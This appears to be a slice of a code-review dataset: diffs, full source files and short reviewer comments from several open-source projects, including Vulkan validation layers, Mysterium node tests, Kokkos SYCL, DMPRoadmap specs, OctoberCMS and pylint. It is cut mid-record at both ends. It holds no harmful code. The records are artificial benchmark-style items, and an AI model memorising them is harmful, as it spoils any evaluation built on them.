pRegions[i].imageSubresource.layerCount, i, 
"vkCmdCopyBufferToImage()", "imageSubresource", "VUID-vkCmdCopyBufferToImage-imageSubresource-01702"); } return skip; } void CoreChecks::PreCallRecordCmdCopyBufferToImage(VkCommandBuffer commandBuffer, VkBuffer srcBuffer, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_buffer_state = GetBufferState(srcBuffer); auto dst_image_state = GetImageState(dstImage); // Make sure that all image slices are updated to correct layout for (uint32_t i = 0; i < regionCount; ++i) { SetImageLayout(cb_node, dst_image_state, pRegions[i].imageSubresource, dstImageLayout); } AddCommandBufferBindingBuffer(cb_node, src_buffer_state); AddCommandBufferBindingImage(cb_node, dst_image_state); } bool CoreChecks::PreCallValidateGetImageSubresourceLayout(VkDevice device, VkImage image, const VkImageSubresource *pSubresource, VkSubresourceLayout *pLayout) { bool skip = false; const VkImageAspectFlags sub_aspect = pSubresource->aspectMask; // The aspectMask member of pSubresource must only have a single bit set const int num_bits = sizeof(sub_aspect) * CHAR_BIT; std::bitset<num_bits> aspect_mask_bits(sub_aspect); if (aspect_mask_bits.count() != 1) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-aspectMask-00997", "vkGetImageSubresourceLayout(): VkImageSubresource.aspectMask must have exactly 1 bit set."); } IMAGE_STATE *image_entry = GetImageState(image); if (!image_entry) { return skip; } // image must have been created with tiling equal to VK_IMAGE_TILING_LINEAR if (image_entry->createInfo.tiling != VK_IMAGE_TILING_LINEAR) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-image-00996", "vkGetImageSubresourceLayout(): Image must have tiling of VK_IMAGE_TILING_LINEAR."); } // 
mipLevel must be less than the mipLevels specified in VkImageCreateInfo when the image was created if (pSubresource->mipLevel >= image_entry->createInfo.mipLevels) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-mipLevel-01716", "vkGetImageSubresourceLayout(): pSubresource.mipLevel (%d) must be less than %d.", pSubresource->mipLevel, image_entry->createInfo.mipLevels); } // arrayLayer must be less than the arrayLayers specified in VkImageCreateInfo when the image was created if (pSubresource->arrayLayer >= image_entry->createInfo.arrayLayers) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-arrayLayer-01717", "vkGetImageSubresourceLayout(): pSubresource.arrayLayer (%d) must be less than %d.", pSubresource->arrayLayer, image_entry->createInfo.arrayLayers); } // subresource's aspect must be compatible with image's format. 
const VkFormat img_format = image_entry->createInfo.format; if (FormatIsMultiplane(img_format)) { VkImageAspectFlags allowed_flags = (VK_IMAGE_ASPECT_PLANE_0_BIT_KHR | VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); const char *vuid = "VUID-vkGetImageSubresourceLayout-format-01581"; // 2-plane version if (FormatPlaneCount(img_format) > 2u) { allowed_flags |= VK_IMAGE_ASPECT_PLANE_2_BIT_KHR; vuid = "VUID-vkGetImageSubresourceLayout-format-01582"; // 3-plane version } if (sub_aspect != (sub_aspect & allowed_flags)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid, "vkGetImageSubresourceLayout(): For multi-planar images, VkImageSubresource.aspectMask (0x%" PRIx32 ") must be a single-plane specifier flag.", sub_aspect); } } else if (FormatIsColor(img_format)) { if (sub_aspect != VK_IMAGE_ASPECT_COLOR_BIT) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-VkImageSubresource-aspectMask-parameter", "vkGetImageSubresourceLayout(): For color formats, VkImageSubresource.aspectMask must be VK_IMAGE_ASPECT_COLOR."); } } else if (FormatIsDepthOrStencil(img_format)) { if ((sub_aspect != VK_IMAGE_ASPECT_DEPTH_BIT) && (sub_aspect != VK_IMAGE_ASPECT_STENCIL_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-VkImageSubresource-aspectMask-parameter", "vkGetImageSubresourceLayout(): For depth/stencil formats, VkImageSubresource.aspectMask must be " "either VK_IMAGE_ASPECT_DEPTH_BIT or VK_IMAGE_ASPECT_STENCIL_BIT."); } } if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) { skip |= ValidateGetImageSubresourceLayoutANDROID(image); } return skip; }
1
10,434
FormatHandle isn't currently typesafe w.r.t. requiring *VULKAN* handles... so this slipped through.
KhronosGroup-Vulkan-ValidationLayers
cpp
@@ -21,6 +21,7 @@ import ( "errors" "testing" + "github.com/asaskevich/EventBus" "github.com/stretchr/testify/assert" "github.com/mysteriumnetwork/node/identity"
1
/*
 * Copyright (C) 2019 The "MysteriumNetwork/node" Authors.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

package service

import (
	"errors"
	"testing"

	"github.com/stretchr/testify/assert"

	"github.com/mysteriumnetwork/node/identity"
	"github.com/mysteriumnetwork/node/market"
)

var (
	// serviceType is the dummy service type registered by these tests.
	serviceType = "the-very-awesome-test-service-type"
)

// TestManager_StartRemovesServiceFromPoolIfServiceCrashes registers a service whose
// Serve call fails (onStartReturnError is set) and verifies that, once discovery
// finishes, the crashed service has been removed from the manager's pool.
func TestManager_StartRemovesServiceFromPoolIfServiceCrashes(t *testing.T) {
	registry := NewRegistry()
	mockCopy := *serviceMock
	mockCopy.onStartReturnError = errors.New("some error")
	registry.Register(serviceType, func(options Options) (Service, market.ServiceProposal, error) {
		return &mockCopy, proposalMock, nil
	})

	discovery := mockDiscovery{}
	discoveryFactory := MockDiscoveryFactoryFunc(&discovery)
	manager := NewManager(
		registry,
		MockDialogWaiterFactory,
		MockDialogHandlerFactory,
		discoveryFactory,
		&MockNATPinger{},
	)
	// Start should succeed even though the service itself will fail asynchronously.
	_, err := manager.Start(identity.FromAddress(proposalMock.ProviderID), serviceType, struct{}{})
	assert.Nil(t, err)

	discovery.Wait()
	assert.Len(t, manager.servicePool.List(), 0)
}

// TestManager_StartDoesNotCrashIfStoppedByUser starts a long-running service
// (mockProcess blocks until closed) and verifies that an explicit Stop empties
// the service pool without error.
func TestManager_StartDoesNotCrashIfStoppedByUser(t *testing.T) {
	registry := NewRegistry()
	mockCopy := *serviceMock
	mockCopy.mockProcess = make(chan struct{})
	registry.Register(serviceType, func(options Options) (Service, market.ServiceProposal, error) {
		return &mockCopy, proposalMock, nil
	})

	discovery := mockDiscovery{}
	discoveryFactory := MockDiscoveryFactoryFunc(&discovery)
	manager := NewManager(
		registry,
		MockDialogWaiterFactory,
		MockDialogHandlerFactory,
		discoveryFactory,
		&MockNATPinger{},
	)
	id, err := manager.Start(identity.FromAddress(proposalMock.ProviderID), serviceType, struct{}{})
	assert.Nil(t, err)

	err = manager.Stop(id)
	assert.Nil(t, err)

	discovery.Wait()
	assert.Len(t, manager.servicePool.List(), 0)
}
1
14,018
What kind of dependency is this? I think we have our own implementation of events, without external dependencies.
mysteriumnetwork-node
go
@@ -125,6 +125,18 @@ SYCL::SYCLDevice::SYCLDevice(sycl::device d) : m_device(std::move(d)) {} SYCL::SYCLDevice::SYCLDevice(const sycl::device_selector& selector) : m_device(selector.select_device()) {} +SYCL::SYCLDevice::SYCLDevice(size_t id) { + std::vector<sycl::device> gpu_devices = + sycl::device::get_devices(sycl::info::device_type::gpu); + if (id >= gpu_devices.size()) { + std::stringstream error_message; + error_message << "Requested GPU with id " << id << " but only " + << gpu_devices.size() << " GPU(s) available!\n"; + Kokkos::abort(error_message.str().c_str()); + } + m_device = gpu_devices[id]; +} + sycl::device SYCL::SYCLDevice::get_device() const { return m_device; } void SYCL::impl_initialize(SYCL::SYCLDevice d) {
1
/* //@HEADER // ************************************************************************ // // Kokkos v. 3.0 // Copyright (2020) National Technology & Engineering // Solutions of Sandia, LLC (NTESS). // // Under the terms of Contract DE-NA0003525 with NTESS, // the U.S. Government retains certain rights in this software. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // 1. Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // // 3. Neither the name of the Corporation nor the names of the // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY NTESS "AS IS" AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NTESS OR THE // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING // NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS // SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Questions? Contact Christian R. 
Trott ([email protected]) // // ************************************************************************ //@HEADER */ #include <Kokkos_Concepts.hpp> #include <SYCL/Kokkos_SYCL_Instance.hpp> #include <Kokkos_SYCL.hpp> #include <Kokkos_HostSpace.hpp> #include <Kokkos_Serial.hpp> #include <Kokkos_Core.hpp> #include <impl/Kokkos_Error.hpp> namespace { template <typename C> struct Container { explicit Container(const C& c) : container(c) {} friend std::ostream& operator<<(std::ostream& os, const Container& that) { os << that.container.size(); for (const auto& v : that.container) { os << "\n\t" << v; } return os; } private: const C& container; }; } // namespace namespace Kokkos { namespace Impl { // forward-declaration int get_gpu(const InitArguments& args); } // namespace Impl namespace Experimental { SYCL::SYCL() : m_space_instance(&Impl::SYCLInternal::singleton(), [](Impl::SYCLInternal*) {}) { Impl::SYCLInternal::singleton().verify_is_initialized( "SYCL instance constructor"); } SYCL::SYCL(const sycl::queue& stream) : m_space_instance(new Impl::SYCLInternal, [](Impl::SYCLInternal* ptr) { ptr->finalize(); delete ptr; }) { Impl::SYCLInternal::singleton().verify_is_initialized( "SYCL instance constructor"); m_space_instance->initialize(stream); } int SYCL::concurrency() { return Impl::SYCLInternal::singleton().m_maxConcurrency; } const char* SYCL::name() { return "SYCL"; } bool SYCL::impl_is_initialized() { return Impl::SYCLInternal::singleton().is_initialized(); } void SYCL::impl_finalize() { Impl::SYCLInternal::singleton().finalize(); } void SYCL::fence() const { Impl::SYCLInternal::fence(*m_space_instance->m_queue); } void SYCL::impl_static_fence() { // guard accessing all_queues std::lock_guard<std::mutex> lock(Impl::SYCLInternal::mutex); for (auto& queue : Impl::SYCLInternal::all_queues) Impl::SYCLInternal::fence(**queue); } int SYCL::sycl_device() const { return impl_internal_space_instance()->m_syclDev; } SYCL::SYCLDevice::SYCLDevice(sycl::device d) : 
m_device(std::move(d)) {} SYCL::SYCLDevice::SYCLDevice(const sycl::device_selector& selector) : m_device(selector.select_device()) {} sycl::device SYCL::SYCLDevice::get_device() const { return m_device; } void SYCL::impl_initialize(SYCL::SYCLDevice d) { Impl::SYCLInternal::singleton().initialize(d.get_device()); } std::ostream& SYCL::SYCLDevice::info(std::ostream& os) const { using namespace sycl::info; return os << "Name: " << m_device.get_info<device::name>() << "\nDriver Version: " << m_device.get_info<device::driver_version>() << "\nIs Host: " << m_device.is_host() << "\nIs CPU: " << m_device.is_cpu() << "\nIs GPU: " << m_device.is_gpu() << "\nIs Accelerator: " << m_device.is_accelerator() << "\nVendor Id: " << m_device.get_info<device::vendor_id>() << "\nMax Compute Units: " << m_device.get_info<device::max_compute_units>() << "\nMax Work Item Dimensions: " << m_device.get_info<device::max_work_item_dimensions>() << "\nMax Work Group Size: " << m_device.get_info<device::max_work_group_size>() << "\nPreferred Vector Width Char: " << m_device.get_info<device::preferred_vector_width_char>() << "\nPreferred Vector Width Short: " << m_device.get_info<device::preferred_vector_width_short>() << "\nPreferred Vector Width Int: " << m_device.get_info<device::preferred_vector_width_int>() << "\nPreferred Vector Width Long: " << m_device.get_info<device::preferred_vector_width_long>() << "\nPreferred Vector Width Float: " << m_device.get_info<device::preferred_vector_width_float>() << "\nPreferred Vector Width Double: " << m_device.get_info<device::preferred_vector_width_double>() << "\nPreferred Vector Width Half: " << m_device.get_info<device::preferred_vector_width_half>() << "\nNative Vector Width Char: " << m_device.get_info<device::native_vector_width_char>() << "\nNative Vector Width Short: " << m_device.get_info<device::native_vector_width_short>() << "\nNative Vector Width Int: " << m_device.get_info<device::native_vector_width_int>() << "\nNative Vector Width 
Long: " << m_device.get_info<device::native_vector_width_long>() << "\nNative Vector Width Float: " << m_device.get_info<device::native_vector_width_float>() << "\nNative Vector Width Double: " << m_device.get_info<device::native_vector_width_double>() << "\nNative Vector Width Half: " << m_device.get_info<device::native_vector_width_half>() << "\nAddress Bits: " << m_device.get_info<device::address_bits>() << "\nImage Support: " << m_device.get_info<device::image_support>() << "\nMax Mem Alloc Size: " << m_device.get_info<device::max_mem_alloc_size>() << "\nMax Read Image Args: " << m_device.get_info<device::max_read_image_args>() << "\nImage2d Max Width: " << m_device.get_info<device::image2d_max_width>() << "\nImage2d Max Height: " << m_device.get_info<device::image2d_max_height>() << "\nImage3d Max Width: " << m_device.get_info<device::image3d_max_width>() << "\nImage3d Max Height: " << m_device.get_info<device::image3d_max_height>() << "\nImage3d Max Depth: " << m_device.get_info<device::image3d_max_depth>() << "\nImage Max Buffer Size: " << m_device.get_info<device::image_max_buffer_size>() << "\nImage Max Array Size: " << m_device.get_info<device::image_max_array_size>() << "\nMax Samplers: " << m_device.get_info<device::max_samplers>() << "\nMax Parameter Size: " << m_device.get_info<device::max_parameter_size>() << "\nMem Base Addr Align: " << m_device.get_info<device::mem_base_addr_align>() << "\nGlobal Cache Mem Line Size: " << m_device.get_info<device::global_mem_cache_line_size>() << "\nGlobal Mem Cache Size: " << m_device.get_info<device::global_mem_cache_size>() << "\nGlobal Mem Size: " << m_device.get_info<device::global_mem_size>() << "\nMax Constant Buffer Size: " << m_device.get_info<device::max_constant_buffer_size>() << "\nMax Constant Args: " << m_device.get_info<device::max_constant_args>() << "\nLocal Mem Size: " << m_device.get_info<device::local_mem_size>() << "\nError Correction Support: " << 
m_device.get_info<device::error_correction_support>() << "\nHost Unified Memory: " << m_device.get_info<device::host_unified_memory>() << "\nProfiling Timer Resolution: " << m_device.get_info<device::profiling_timer_resolution>() << "\nIs Endian Little: " << m_device.get_info<device::is_endian_little>() << "\nIs Available: " << m_device.get_info<device::is_available>() << "\nIs Compiler Available: " << m_device.get_info<device::is_compiler_available>() << "\nIs Linker Available: " << m_device.get_info<device::is_linker_available>() << "\nQueue Profiling: " << m_device.get_info<device::queue_profiling>() << "\nBuilt In Kernels: " << Container<std::vector<std::string>>( m_device.get_info<device::built_in_kernels>()) << "\nVendor: " << m_device.get_info<device::vendor>() << "\nProfile: " << m_device.get_info<device::profile>() << "\nVersion: " << m_device.get_info<device::version>() << "\nExtensions: " << Container<std::vector<std::string>>( m_device.get_info<device::extensions>()) << "\nPrintf Buffer Size: " << m_device.get_info<device::printf_buffer_size>() << "\nPreferred Interop User Sync: " << m_device.get_info<device::preferred_interop_user_sync>() << "\nPartition Max Sub Devices: " << m_device.get_info<device::partition_max_sub_devices>() << "\nReference Count: " << m_device.get_info<device::reference_count>() << '\n'; } namespace Impl { int g_sycl_space_factory_initialized = Kokkos::Impl::initialize_space_factory<SYCLSpaceInitializer>("170_SYCL"); void SYCLSpaceInitializer::initialize(const InitArguments& args) { int use_gpu = Kokkos::Impl::get_gpu(args); if (std::is_same<Kokkos::Experimental::SYCL, Kokkos::DefaultExecutionSpace>::value || 0 < use_gpu) { // FIXME_SYCL choose a specific device Kokkos::Experimental::SYCL::impl_initialize( Kokkos::Experimental::SYCL::SYCLDevice(sycl::default_selector())); } } void SYCLSpaceInitializer::finalize(const bool all_spaces) { if (std::is_same<Kokkos::Experimental::SYCL, Kokkos::DefaultExecutionSpace>::value || 
all_spaces) { if (Kokkos::Experimental::SYCL::impl_is_initialized()) Kokkos::Experimental::SYCL::impl_finalize(); } } void SYCLSpaceInitializer::fence() { Kokkos::Experimental::SYCL::impl_static_fence(); } void SYCLSpaceInitializer::print_configuration(std::ostream& msg, const bool /*detail*/) { msg << "Devices:" << std::endl; msg << " KOKKOS_ENABLE_SYCL: "; msg << "yes" << std::endl; msg << "\nRuntime Configuration:" << std::endl; // FIXME_SYCL not implemented std::abort(); // Experimental::SYCL::print_configuration(msg, detail); } } // namespace Impl } // namespace Experimental } // namespace Kokkos
1
28,509
Throw an exception instead
kokkos-kokkos
cpp
@@ -6,6 +6,9 @@ RSpec.describe Org::CreateLastMonthCreatedPlanService do let(:org) do FactoryBot.create(:org, created_at: DateTime.new(2018, 04, 01)) end + let(:org2) do + FactoryBot.create(:org) + end let(:template) do FactoryBot.create(:template, org: org) end
1
# frozen_string_literal: true require "rails_helper" RSpec.describe Org::CreateLastMonthCreatedPlanService do let(:org) do FactoryBot.create(:org, created_at: DateTime.new(2018, 04, 01)) end let(:template) do FactoryBot.create(:template, org: org) end let(:template2) do FactoryBot.create(:template, org: org) end let(:user1) do FactoryBot.create(:user, org: org) end let(:user2) do FactoryBot.create(:user, org: org) end let(:creator) { Role.access_values_for(:creator).first } let(:administrator) { Role.access_values_for(:administrator).first } before(:each) do plan = FactoryBot.create(:plan, template: template, created_at: Date.today.last_month) plan2 = FactoryBot.create(:plan, template: template, created_at: Date.today.last_month) plan3 = FactoryBot.create(:plan, template: template2, created_at: Date.today.last_month) FactoryBot.create(:role, :creator, plan: plan, user: user1) FactoryBot.create(:role, :administrator, plan: plan, user: user1) FactoryBot.create(:role, :creator, plan: plan2, user: user1) FactoryBot.create(:role, :creator, plan: plan3, user: user2) end describe ".call" do context "when org is passed" do it "generates counts from today's last month" do described_class.call(org) last_month_count = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).count expect(last_month_count).to eq(3) end it "generates counts by template from today's last month" do described_class.call(org) last_month_details = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).details expect(last_month_details).to match_array( "by_template" => [ { "name" => template.title, "count" => 2 }, { "name" => template2.title, "count" => 1 }, ] ) end it "monthly records are either created or updated" do described_class.call(org) last_month = StatCreatedPlan.where( date: Date.today.last_month.end_of_month, org_id: org.id) expect(last_month).to have(1).items expect(last_month.first.count).to eq(3) new_plan = FactoryBot.create(:plan, 
template: template2, created_at: Date.today.last_month.end_of_month) FactoryBot.create(:role, :creator, plan: new_plan, user: user1) described_class.call(org) last_month = StatCreatedPlan.where( date: Date.today.last_month.end_of_month, org_id: org.id) expect(last_month).to have(1).items expect(last_month.first.count).to eq(4) end end context "when no org is passed" do it "generates counts from today's last month" do Org.expects(:all).returns([org]) described_class.call last_month_count = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).count expect(last_month_count).to eq(3) end it "generates counts by template from today's last month" do Org.expects(:all).returns([org]) described_class.call last_month_details = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).details expect(last_month_details).to match_array( "by_template" => [ { "name" => template.title, "count" => 2 }, { "name" => template2.title, "count" => 1 }, ] ) end it "monthly records are either created or updated" do Org.stubs(:all).returns([org]) described_class.call last_month = StatCreatedPlan.where( date: Date.today.last_month.end_of_month, org: org) expect(last_month).to have(1).items expect(last_month.first.count).to eq(3) new_plan = FactoryBot.create(:plan, template: template2, created_at: Date.today.last_month.end_of_month) FactoryBot.create(:role, :creator, plan: new_plan, user: user1) described_class.call last_month = StatCreatedPlan.where(date: Date.today.last_month.end_of_month, org: org) expect(last_month).to have(1).items expect(last_month.first.count).to eq(4) end end end end
1
18,910
we shouldn't need the `FactoryBot.` in these. Ok to leave for now since all of these specs have them. Can clean up later
DMPRoadmap-roadmap
rb
@@ -80,7 +80,7 @@ class File extends FileBase $uploadsPath .= '/protected'; } - return Url::asset($uploadsPath) . '/'; + return Storage::url($uploadsPath) . '/'; } /**
1
<?php namespace System\Models; use Url; use Config; use File as FileHelper; use Storage; use October\Rain\Database\Attach\File as FileBase; use Backend\Controllers\Files; /** * File attachment model * * @package october\system * @author Alexey Bobkov, Samuel Georges */ class File extends FileBase { /** * @var string The database table used by the model. */ protected $table = 'system_files'; /** * {@inheritDoc} */ public function getThumb($width, $height, $options = []) { $url = ''; $width = !empty($width) ? $width : 0; $height = !empty($height) ? $height : 0; if (!$this->isPublic() && class_exists(Files::class)) { $options = $this->getDefaultThumbOptions($options); // Ensure that the thumb exists first parent::getThumb($width, $height, $options); // Return the Files controller handler for the URL $url = Files::getThumbUrl($this, $width, $height, $options); } else { $url = parent::getThumb($width, $height, $options); } return $url; } /** * {@inheritDoc} */ public function getPath($fileName = null) { $url = ''; if (!$this->isPublic() && class_exists(Files::class)) { $url = Files::getDownloadUrl($this); } else { $url = parent::getPath($fileName); } return $url; } /** * If working with local storage, determine the absolute local path. */ protected function getLocalRootPath() { return Config::get('filesystems.disks.local.root', storage_path('app')); } /** * Define the public address for the storage path. */ public function getPublicPath() { $uploadsPath = Config::get('cms.storage.uploads.path', '/storage/app/uploads'); if ($this->isPublic()) { $uploadsPath .= '/public'; } else { $uploadsPath .= '/protected'; } return Url::asset($uploadsPath) . '/'; } /** * Define the internal storage path. */ public function getStorageDirectory() { $uploadsFolder = Config::get('cms.storage.uploads.folder'); if ($this->isPublic()) { return $uploadsFolder . '/public/'; } return $uploadsFolder . 
'/protected/'; } /** * Returns the storage disk the file is stored on * @return FilesystemAdapter */ public function getDisk() { return Storage::disk(Config::get('cms.storage.uploads.disk')); } }
1
19,478
Isn't the better option to actually do `$this->getDisk()->url($uploadsPath)` without changing the filesystems config? Not sure why you think that change is required but it's definitely not getting merged.
octobercms-october
php
@@ -1585,7 +1585,7 @@ accessed. Python regular expressions are accepted.", not isinstance(itemmethod, nodes.FunctionDef) or itemmethod.root().name != "builtins" or not itemmethod.parent - or itemmethod.parent.name not in SEQUENCE_TYPES + or itemmethod.parent.frame().name not in SEQUENCE_TYPES ): return None
1
# Copyright (c) 2006-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2009 James Lingard <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2014-2020 Claudiu Popa <[email protected]> # Copyright (c) 2014 David Shea <[email protected]> # Copyright (c) 2014 Steven Myint <[email protected]> # Copyright (c) 2014 Holger Peters <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Anentropic <[email protected]> # Copyright (c) 2015 Dmitry Pribysh <[email protected]> # Copyright (c) 2015 Rene Zhang <[email protected]> # Copyright (c) 2015 Radu Ciorba <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016, 2019 Ashley Whetter <[email protected]> # Copyright (c) 2016 Alexander Todorov <[email protected]> # Copyright (c) 2016 Jürgen Hermann <[email protected]> # Copyright (c) 2016 Jakub Wilk <[email protected]> # Copyright (c) 2016 Filipe Brandenburger <[email protected]> # Copyright (c) 2017, 2021 Ville Skyttä <[email protected]> # Copyright (c) 2017-2018, 2020 hippo91 <[email protected]> # Copyright (c) 2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2017 Derek Gustafson <[email protected]> # Copyright (c) 2018-2019, 2021 Nick Drozd <[email protected]> # Copyright (c) 2018 Pablo Galindo <[email protected]> # Copyright (c) 2018 Jim Robertson <[email protected]> # Copyright (c) 2018 Lucas Cimon <[email protected]> # Copyright (c) 2018 Mike Frysinger <[email protected]> # Copyright (c) 2018 Ben Green <[email protected]> # Copyright (c) 2018 Konstantin <[email protected]> # Copyright (c) 2018 Justin Li <[email protected]> # Copyright (c) 2018 Bryce Guinta <[email protected]> # Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]> # Copyright (c) 2019 Andy Palmer <[email protected]> # Copyright (c) 2019 mattlbeck <[email protected]> # Copyright (c) 2019 Martin Vielsmaier <[email protected]> # Copyright (c) 2019 Santiago Castro 
<[email protected]> # Copyright (c) 2019 yory8 <[email protected]> # Copyright (c) 2019 Federico Bond <[email protected]> # Copyright (c) 2019 Pascal Corpet <[email protected]> # Copyright (c) 2020 Peter Kolbus <[email protected]> # Copyright (c) 2020 Julien Palard <[email protected]> # Copyright (c) 2020 Ram Rachum <[email protected]> # Copyright (c) 2020 Anthony Sottile <[email protected]> # Copyright (c) 2020 Anubhav <[email protected]> # Copyright (c) 2021 Marc Mueller <[email protected]> # Copyright (c) 2021 Tushar Sadhwani <[email protected]> # Copyright (c) 2021 Daniël van Noord <[email protected]> # Copyright (c) 2021 David Liu <[email protected]> # Copyright (c) 2021 doranid <[email protected]> # Copyright (c) 2021 Yu Shao, Pang <[email protected]> # Copyright (c) 2021 Andrew Haigh <[email protected]> # Copyright (c) 2021 Jens H. Nielsen <[email protected]> # Copyright (c) 2021 Ikraduya Edian <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/main/LICENSE """try to find more bugs in the code using astroid inference capabilities""" import fnmatch import heapq import itertools import operator import re import shlex import sys import types from collections import deque from collections.abc import Sequence from functools import singledispatch from typing import ( TYPE_CHECKING, Any, Callable, Iterator, List, Optional, Pattern, Tuple, Union, ) import astroid import astroid.exceptions from astroid import bases, nodes from pylint.checkers import BaseChecker, utils from pylint.checkers.utils import ( check_messages, decorated_with, decorated_with_property, has_known_bases, is_builtin_object, is_classdef_type, is_comprehension, is_inside_abstract_class, is_iterable, is_mapping, is_overload_stub, is_postponed_evaluation_enabled, is_super, node_ignores_exception, safe_infer, supports_delitem, supports_getitem, supports_membership_test, supports_setitem, ) from 
pylint.interfaces import INFERENCE, IAstroidChecker from pylint.utils import get_global_option if TYPE_CHECKING: from pylint.lint import PyLinter CallableObjects = Union[ bases.BoundMethod, bases.UnboundMethod, nodes.FunctionDef, nodes.Lambda, nodes.ClassDef, ] STR_FORMAT = {"builtins.str.format"} ASYNCIO_COROUTINE = "asyncio.coroutines.coroutine" BUILTIN_TUPLE = "builtins.tuple" TYPE_ANNOTATION_NODES_TYPES = ( nodes.AnnAssign, nodes.Arguments, nodes.FunctionDef, ) def _unflatten(iterable): for index, elem in enumerate(iterable): if isinstance(elem, Sequence) and not isinstance(elem, str): yield from _unflatten(elem) elif elem and not index: # We're interested only in the first element. yield elem def _flatten_container(iterable): # Flatten nested containers into a single iterable for item in iterable: if isinstance(item, (list, tuple, types.GeneratorType)): yield from _flatten_container(item) else: yield item def _is_owner_ignored(owner, attrname, ignored_classes, ignored_modules): """Check if the given owner should be ignored This will verify if the owner's module is in *ignored_modules* or the owner's module fully qualified name is in *ignored_modules* or if the *ignored_modules* contains a pattern which catches the fully qualified name of the module. Also, similar checks are done for the owner itself, if its name matches any name from the *ignored_classes* or if its qualified name can be found in *ignored_classes*. """ ignored_modules = set(ignored_modules) module_name = owner.root().name module_qname = owner.root().qname() for ignore in ignored_modules: # Try to match the module name / fully qualified name directly if module_qname in ignored_modules or module_name in ignored_modules: return True # Try to see if the ignores pattern match against the module name. if fnmatch.fnmatch(module_qname, ignore): return True # Otherwise, we might have a root module name being ignored, # and the qualified owner has more levels of depth. 
parts = deque(module_name.split(".")) current_module = "" while parts: part = parts.popleft() if not current_module: current_module = part else: current_module += f".{part}" if current_module in ignored_modules: return True # Match against ignored classes. ignored_classes = set(ignored_classes) qname = owner.qname() if hasattr(owner, "qname") else "" return any(ignore in (attrname, qname) for ignore in ignored_classes) @singledispatch def _node_names(node): if not hasattr(node, "locals"): return [] return node.locals.keys() @_node_names.register(nodes.ClassDef) @_node_names.register(astroid.Instance) def _(node): values = itertools.chain(node.instance_attrs.keys(), node.locals.keys()) try: mro = node.mro()[1:] except (NotImplementedError, TypeError, astroid.MroError): mro = node.ancestors() other_values = [value for cls in mro for value in _node_names(cls)] return itertools.chain(values, other_values) def _string_distance(seq1, seq2): seq2_length = len(seq2) row = list(range(1, seq2_length + 1)) + [0] for seq1_index, seq1_char in enumerate(seq1): last_row = row row = [0] * seq2_length + [seq1_index + 1] for seq2_index, seq2_char in enumerate(seq2): row[seq2_index] = min( last_row[seq2_index] + 1, row[seq2_index - 1] + 1, last_row[seq2_index - 1] + (seq1_char != 